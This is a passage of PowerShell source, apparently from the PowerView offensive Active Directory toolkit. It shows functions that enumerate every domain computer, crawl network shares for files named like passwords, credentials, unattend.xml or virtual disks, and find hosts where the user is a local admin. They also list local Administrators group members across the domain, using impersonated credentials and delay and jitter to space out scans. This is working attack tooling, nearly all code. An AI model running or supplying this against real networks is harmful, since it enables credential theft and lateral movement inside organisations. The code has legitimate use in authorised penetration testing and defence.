ComputerLDAPFilter\n\nSpecifies an LDAP query string that is used to search for computer objects.\n\n.PARAMETER ComputerSearchBase\n\nSpecifies the LDAP source to search through for computers,\ne.g. \"LDAP://OU=secret,DC=testlab,DC=local\". Useful for OU queries.\n\n.PARAMETER ComputerOperatingSystem\n\nSearch computers with a specific operating system, wildcards accepted.\n\n.PARAMETER ComputerServicePack\n\nSearch computers with a specific service pack, wildcards accepted.\n\n.PARAMETER ComputerSiteName\n\nSearch computers in the specific AD Site name, wildcards accepted.\n\n.PARAMETER Include\n\nOnly return files/folders that match the specified array of strings,\ni.e. @(*.doc*, *.xls*, *.ppt*)\n\n.PARAMETER SharePath\n\nSpecifies one or more specific share paths to search, in the form \\\\COMPUTER\\Share\n\n.PARAMETER ExcludedShares\n\nSpecifies share paths to exclude, default of C$, Admin$, Print$, IPC$.\n\n.PARAMETER LastAccessTime\n\nOnly return files with a LastAccessTime greater than this date value.\n\n.PARAMETER LastWriteTime\n\nOnly return files with a LastWriteTime greater than this date value.\n\n.PARAMETER CreationTime\n\nOnly return files with a CreationTime greater than this date value.\n\n.PARAMETER OfficeDocs\n\nSwitch. Search for office documents (*.doc*, *.xls*, *.ppt*)\n\n.PARAMETER FreshEXEs\n\nSwitch. Find .EXEs accessed within the last 7 days.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain and target systems.\n\n.PARAMETER Delay\n\nSpecifies the delay (in seconds) between enumerating hosts, defaults to 0.\n\n.PARAMETER Jitter\n\nSpecifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3\n\n.PARAMETER Threads\n\nThe number of threads to use for user searching, defaults to 20.\n\n.EXAMPLE\n\nFind-InterestingDomainShareFile\n\nFinds 'interesting' files on the current domain.\n\n.EXAMPLE\n\nFind-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local')\n\nFinds 'interesting' files on readable shares on the specified systems.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('DEV\\dfm.a', $SecPassword)\nFind-DomainShare -Domain testlab.local -Credential $Cred\n\nSearches interesting files in the testlab.local domain using the specified alternate credentials.\n\n.OUTPUTS\n\nPowerView.FoundFile\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.FoundFile')]\n    [CmdletBinding(DefaultParameterSetName = 'FileSpecification')]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DNSHostName')]\n        [String[]]\n        $ComputerName,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerDomain,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerLDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerSearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('OperatingSystem')]\n        [String]\n        $ComputerOperatingSystem,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ServicePack')]\n        [String]\n        $ComputerServicePack,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('SiteName')]\n        [String]\n        $ComputerSiteName,\n\n        [Parameter(ParameterSetName = 'FileSpecification')]\n        [ValidateNotNullOrEmpty()]\n        [Alias('SearchTerms', 'Terms')]\n        [String[]]\n        $Include = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'),\n\n        [ValidateNotNullOrEmpty()]\n        [ValidatePattern('\\\\\\\\')]\n        [Alias('Share')]\n        [String[]]\n        $SharePath,\n\n        [String[]]\n        $ExcludedShares = @('C$', 'Admin$', 'Print$', 'IPC$'),\n\n        [Parameter(ParameterSetName = 'FileSpecification')]\n        [ValidateNotNullOrEmpty()]\n        [DateTime]\n        $LastAccessTime,\n\n        [Parameter(ParameterSetName = 'FileSpecification')]\n        [ValidateNotNullOrEmpty()]\n        [DateTime]\n        $LastWriteTime,\n\n        [Parameter(ParameterSetName = 'FileSpecification')]\n        [ValidateNotNullOrEmpty()]\n        [DateTime]\n        $CreationTime,\n\n        [Parameter(ParameterSetName = 'OfficeDocs')]\n        [Switch]\n        $OfficeDocs,\n\n        [Parameter(ParameterSetName = 'FreshEXEs')]\n        [Switch]\n        $FreshEXEs,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $Delay = 0,\n\n        [ValidateRange(0.0, 1.0)]\n        [Double]\n        $Jitter = .3,\n\n        [Int]\n        [ValidateRange(1, 100)]\n        $Threads = 20\n    )\n\n    BEGIN {\n        $ComputerSearcherArguments = @{\n            'Properties' = 'dnshostname'\n        }\n        if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }\n        if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }\n        if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }\n        if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }\n        if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }\n        if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }\n        if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }\n\n        if ($PSBoundParameters['ComputerName']) {\n            $TargetComputers = $ComputerName\n        }\n        else {\n            Write-Verbose '[Find-InterestingDomainShareFile] Querying computers in the domain'\n            $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname\n        }\n        Write-Verbose \"[Find-InterestingDomainShareFile] TargetComputers length: $($TargetComputers.Length)\"\n        if ($TargetComputers.Length -eq 0) {\n            throw '[Find-InterestingDomainShareFile] No hosts found to enumerate'\n        }\n\n        # the host enumeration block we're using to enumerate all servers\n        $HostEnumBlock = {\n            Param($ComputerName, $Include, $ExcludedShares, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $TokenHandle)\n\n            if ($TokenHandle) {\n                # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation\n                $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet\n            }\n\n            ForEach ($TargetComputer in $ComputerName) {\n\n                $SearchShares = @()\n                if ($TargetComputer.StartsWith('\\\\')) {\n                    # if a share is passed as the server\n                    $SearchShares += $TargetComputer\n                }\n                else {\n                    $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer\n                    if ($Up) {\n                        # get the shares for this host and display what we find\n                        $Shares = Get-NetShare -ComputerName $TargetComputer\n                        ForEach ($Share in $Shares) {\n                            $ShareName = $Share.Name\n                            $Path = '\\\\'+$TargetComputer+'\\'+$ShareName\n                            # make sure we get a real share name back\n                            if (($ShareName) -and ($ShareName.Trim() -ne '')) {\n                                # skip this share if it's in the exclude list\n                                if ($ExcludedShares -NotContains $ShareName) {\n                                    # check if the user has access to this path\n                                    try {\n                                        $Null = [IO.Directory]::GetFiles($Path)\n                                        $SearchShares += $Path\n                                    }\n                                    catch {\n                                        Write-Verbose \"[!] No access to $Path\"\n                                    }\n                                }\n                            }\n                        }\n                    }\n                }\n\n                ForEach ($Share in $SearchShares) {\n                    Write-Verbose \"Searching share: $Share\"\n                    $SearchArgs = @{\n                        'Path' = $Share\n                        'Include' = $Include\n                    }\n                    if ($OfficeDocs) {\n                        $SearchArgs['OfficeDocs'] = $OfficeDocs\n                    }\n                    if ($FreshEXEs) {\n                        $SearchArgs['FreshEXEs'] = $FreshEXEs\n                    }\n                    if ($LastAccessTime) {\n                        $SearchArgs['LastAccessTime'] = $LastAccessTime\n                    }\n                    if ($LastWriteTime) {\n                        $SearchArgs['LastWriteTime'] = $LastWriteTime\n                    }\n                    if ($CreationTime) {\n                        $SearchArgs['CreationTime'] = $CreationTime\n                    }\n                    if ($CheckWriteAccess) {\n                        $SearchArgs['CheckWriteAccess'] = $CheckWriteAccess\n                    }\n                    Find-InterestingFile @SearchArgs\n                }\n            }\n\n            if ($TokenHandle) {\n                Invoke-RevertToSelf\n            }\n        }\n\n        $LogonToken = $Null\n        if ($PSBoundParameters['Credential']) {\n            if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {\n                $LogonToken = Invoke-UserImpersonation -Credential $Credential\n            }\n            else {\n                $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet\n            }\n        }\n    }\n\n    PROCESS {\n        # only ignore threading if -Delay is passed\n        if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {\n\n            Write-Verbose \"[Find-InterestingDomainShareFile] Total number of hosts: $($TargetComputers.count)\"\n            Write-Verbose \"[Find-InterestingDomainShareFile] Delay: $Delay, Jitter: $Jitter\"\n            $Counter = 0\n            $RandNo = New-Object System.Random\n\n            ForEach ($TargetComputer in $TargetComputers) {\n                $Counter = $Counter + 1\n\n                # sleep for our semi-randomized interval\n                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)\n\n                Write-Verbose \"[Find-InterestingDomainShareFile] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))\"\n                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $Include, $ExcludedShares, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $LogonToken\n            }\n        }\n        else {\n            Write-Verbose \"[Find-InterestingDomainShareFile] Using threading with threads: $Threads\"\n\n            # if we're using threading, kick off the script block with New-ThreadedFunction\n            $ScriptParams = @{\n                'Include' = $Include\n                'ExcludedShares' = $ExcludedShares\n                'OfficeDocs' = $OfficeDocs\n                'ExcludeHidden' = $ExcludeHidden\n                'FreshEXEs' = $FreshEXEs\n                'CheckWriteAccess' = $CheckWriteAccess\n                'TokenHandle' = $LogonToken\n            }\n\n            # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params\n            New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads\n        }\n    }\n\n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\nfunction Find-LocalAdminAccess {\n<#\n.SYNOPSIS\n\nFinds machines on the local domain where the current user has local administrator access.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction  \n\n.DESCRIPTION\n\nThis function enumerates all machines on the current (or specified) domain\nusing Get-DomainComputer, and for each computer it checks if the current user\nhas local administrator access using Test-AdminAccess. If -Credential is passed,\nthen Invoke-UserImpersonation is used to impersonate the specified user\nbefore enumeration, reverting after with Invoke-RevertToSelf.\n\nIdea adapted from the local_admin_search_enum post module in Metasploit written by:\n    'Brandon McCann \"zeknox\" <bmccann[at]accuvant.com>'\n    'Thomas McCarthy \"smilingraccoon\" <smilingraccoon[at]gmail.com>'\n    'Royce Davis \"r3dy\" <rdavis[at]accuvant.com>'\n\n.PARAMETER ComputerName\n\nSpecifies an array of one or more hosts to enumerate, passable on the pipeline.\nIf -ComputerName is not passed, the default behavior is to enumerate all machines\nin the domain returned by Get-DomainComputer.\n\n.PARAMETER ComputerDomain\n\nSpecifies the domain to query for computers, defaults to the current domain.\n\n.PARAMETER ComputerLDAPFilter\n\nSpecifies an LDAP query string that is used to search for computer objects.\n\n.PARAMETER ComputerSearchBase\n\nSpecifies the LDAP source to search through for computers,\ne.g. \"LDAP://OU=secret,DC=testlab,DC=local\". Useful for OU queries.\n\n.PARAMETER ComputerOperatingSystem\n\nSearch computers with a specific operating system, wildcards accepted.\n\n.PARAMETER ComputerServicePack\n\nSearch computers with a specific service pack, wildcards accepted.\n\n.PARAMETER ComputerSiteName\n\nSearch computers in the specific AD Site name, wildcards accepted.\n\n.PARAMETER CheckShareAccess\n\nSwitch. Only display found shares that the local user has access to.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain and target systems.\n\n.PARAMETER Delay\n\nSpecifies the delay (in seconds) between enumerating hosts, defaults to 0.\n\n.PARAMETER Jitter\n\nSpecifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3\n\n.PARAMETER Threads\n\nThe number of threads to use for user searching, defaults to 20.\n\n.EXAMPLE\n\nFind-LocalAdminAccess\n\nFinds machines in the current domain the current user has admin access to.\n\n.EXAMPLE\n\nFind-LocalAdminAccess -Domain dev.testlab.local\n\nFinds machines in the dev.testlab.local domain the current user has admin access to.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nFind-LocalAdminAccess -Domain testlab.local -Credential $Cred\n\nFinds machines in the testlab.local domain that the user with the specified -Credential\nhas admin access to.\n\n.OUTPUTS\n\nString\n\nComputer dnshostnames the current user has administrative access to.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([String])]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DNSHostName')]\n        [String[]]\n        $ComputerName,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerDomain,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerLDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerSearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('OperatingSystem')]\n        [String]\n        $ComputerOperatingSystem,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ServicePack')]\n        [String]\n        $ComputerServicePack,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('SiteName')]\n        [String]\n        $ComputerSiteName,\n\n        [Switch]\n        $CheckShareAccess,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $Delay = 0,\n\n        [ValidateRange(0.0, 1.0)]\n        [Double]\n        $Jitter = .3,\n\n        [Int]\n        [ValidateRange(1, 100)]\n        $Threads = 20\n    )\n\n    BEGIN {\n        $ComputerSearcherArguments = @{\n            'Properties' = 'dnshostname'\n        }\n        if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }\n        if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }\n        if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }\n        if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }\n        if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }\n        if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }\n        if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }\n        if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }\n\n        if ($PSBoundParameters['ComputerName']) {\n            $TargetComputers = $ComputerName\n        }\n        else {\n            Write-Verbose '[Find-LocalAdminAccess] Querying computers in the domain'\n            $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname\n        }\n        Write-Verbose \"[Find-LocalAdminAccess] TargetComputers length: $($TargetComputers.Length)\"\n        if ($TargetComputers.Length -eq 0) {\n            throw '[Find-LocalAdminAccess] No hosts found to enumerate'\n        }\n\n        # the host enumeration block we're using to enumerate all servers\n        $HostEnumBlock = {\n            Param($ComputerName, $TokenHandle)\n\n            if ($TokenHandle) {\n                # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation\n                $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet\n            }\n\n            ForEach ($TargetComputer in $ComputerName) {\n                $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer\n                if ($Up) {\n                    # check if the current user has local admin access to this server\n                    $Access = Test-AdminAccess -ComputerName $TargetComputer\n                    if ($Access.IsAdmin) {\n                        $TargetComputer\n                    }\n                }\n            }\n\n            if ($TokenHandle) {\n                Invoke-RevertToSelf\n            }\n        }\n\n        $LogonToken = $Null\n        if ($PSBoundParameters['Credential']) {\n            if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {\n                $LogonToken = Invoke-UserImpersonation -Credential $Credential\n            }\n            else {\n                $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet\n            }\n        }\n    }\n\n    PROCESS {\n        # only ignore threading if -Delay is passed\n        if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {\n\n            Write-Verbose \"[Find-LocalAdminAccess] Total number of hosts: $($TargetComputers.count)\"\n            Write-Verbose \"[Find-LocalAdminAccess] Delay: $Delay, Jitter: $Jitter\"\n            $Counter = 0\n            $RandNo = New-Object System.Random\n\n            ForEach ($TargetComputer in $TargetComputers) {\n                $Counter = $Counter + 1\n\n                # sleep for our semi-randomized interval\n                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)\n\n                Write-Verbose \"[Find-LocalAdminAccess] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))\"\n                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $LogonToken\n            }\n        }\n        else {\n            Write-Verbose \"[Find-LocalAdminAccess] Using threading with threads: $Threads\"\n\n            # if we're using threading, kick off the script block with New-ThreadedFunction\n            $ScriptParams = @{\n                'TokenHandle' = $LogonToken\n            }\n\n            # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params\n            New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads\n        }\n    }\n}\n\n\nfunction Find-DomainLocalGroupMember {\n<#\n.SYNOPSIS\n\nEnumerates the members of specified local group (default administrators)\nfor all the targeted machines on the current (or specified) domain.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction  \n\n.DESCRIPTION\n\nThis function enumerates all machines on the current (or specified) domain\nusing Get-DomainComputer, and enumerates the members of the specified local\ngroup (default of Administrators) for each machine using Get-NetLocalGroupMember.\nBy default, the API method is used, but this can be modified with '-Method winnt'\nto use the WinNT service provider.\n\n.PARAMETER ComputerName\n\nSpecifies an array of one or more hosts to enumerate, passable on the pipeline.\nIf -ComputerName is not passed, the default behavior is to enumerate all machines\nin the domain returned by Get-DomainComputer.\n\n.PARAMETER ComputerDomain\n\nSpecifies the domain to query for computers, defaults to the current domain.\n\n.PARAMETER ComputerLDAPFilter\n\nSpecifies an LDAP query string that is used to search for computer objects.\n\n.PARAMETER ComputerSearchBase\n\nSpecifies the LDAP source to search through for computers,\ne.g. \"LDAP://OU=secret,DC=testlab,DC=local\". Useful for OU queries.\n\n.PARAMETER ComputerOperatingSystem\n\nSearch computers with a specific operating system, wildcards accepted.\n\n.PARAMETER ComputerServicePack\n\nSearch computers with a specific service pack, wildcards accepted.\n\n.PARAMETER ComputerSiteName\n\nSearch computers in the specific AD Site name, wildcards accepted.\n\n.PARAMETER GroupName\n\nThe local group name to query for users. If not given, it defaults to \"Administrators\".\n\n.PARAMETER Method\n\nThe collection method to use, defaults to 'API', also accepts 'WinNT'.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain and target systems.\n\n.PARAMETER Delay\n\nSpecifies the delay (in seconds) between enumerating hosts, defaults to 0.\n\n.PARAMETER Jitter\n\nSpecifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3\n\n.PARAMETER Threads\n\nThe number of threads to use for user searching, defaults to 20.\n\n.EXAMPLE\n\nFind-DomainLocalGroupMember\n\nEnumerates the local group memberships for all reachable machines in the current domain.\n\n.EXAMPLE\n\nFind-DomainLocalGroupMember -Domain dev.testlab.local\n\nEnumerates the local group memberships for all reachable machines the dev.testlab.local domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nFind-DomainLocalGroupMember -Domain testlab.local -Credential $Cred\n\nEnumerates the local group memberships for all reachable machines the dev.testlab.local\ndomain using the alternate credentials.\n\n.OUTPUTS\n\nPowerView.LocalGroupMember.API\n\nCustom PSObject with translated group property fields from API results.\n\nPowerView.LocalGroupMember.WinNT\n\nCustom PSObject with translated group property fields from WinNT results.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.LocalGroupMember.API')]\n    [OutputType('PowerView.LocalGroupMember.WinNT')]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DNSHostName')]\n        [String[]]\n        $ComputerName,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerDomain,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerLDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerSearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('OperatingSystem')]\n        [String]\n        $ComputerOperatingSystem,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ServicePack')]\n        [String]\n        $ComputerServicePack,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('SiteName')]\n        [String]\n        $ComputerSiteName,\n\n        [Parameter(ValueFromPipelineByPropertyName = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $GroupName = 'Administrators',\n\n        [ValidateSet('API', 'WinNT')]\n        [Alias('CollectionMethod')]\n        [String]\n        $Method = 'API',\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $Delay = 0,\n\n        [ValidateRange(0.0, 1.0)]\n        [Double]\n        $Jitter = .3,\n\n        [Int]\n        [ValidateRange(1, 100)]\n        $Threads = 20\n    )\n\n    BEGIN {\n        $ComputerSearcherArguments = @{\n            'Properties' = 'dnshostname'\n        }\n        if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }\n        if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }\n        if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }\n        if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }\n        if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }\n        if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }\n        if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }\n        if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }\n\n        if ($PSBoundParameters['ComputerName']) {\n            $TargetComputers = $ComputerName\n        }\n        else {\n            Write-Verbose '[Find-DomainLocalGroupMember] Querying computers in the domain'\n            $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname\n        }\n        Write-Verbose \"[Find-DomainLocalGroupMember] TargetComputers length: $($TargetComputers.Length)\"\n        if ($TargetComputers.Length -eq 0) {\n            throw '[Find-DomainLocalGroupMember] No hosts found to enumerate'\n        }\n\n        # the host enumeration block we're using to enumerate all servers\n        $HostEnumBlock = {\n            Param($ComputerName, $GroupName, $Method, $TokenHandle)\n\n            # Add check if user defaults to/selects \"Administrators\"\n            if ($GroupName -eq \"Administrators\") {\n                $AdminSecurityIdentifier = New-Object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::BuiltinAdministratorsSid,$null)\n                $GroupName = ($AdminSecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value -split \"\\\\\")[-1]\n            }\n\n            if ($TokenHandle) {\n                # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation\n                $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet\n            }\n\n            ForEach ($TargetComputer in $ComputerName) {\n                $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer\n                if ($Up) {\n                    $NetLocalGroupMemberArguments = @{\n                        'ComputerName' = $TargetComputer\n                        'Method' = $Method\n                        'GroupName' = $GroupName\n                    }\n                    Get-NetLocalGroupMember 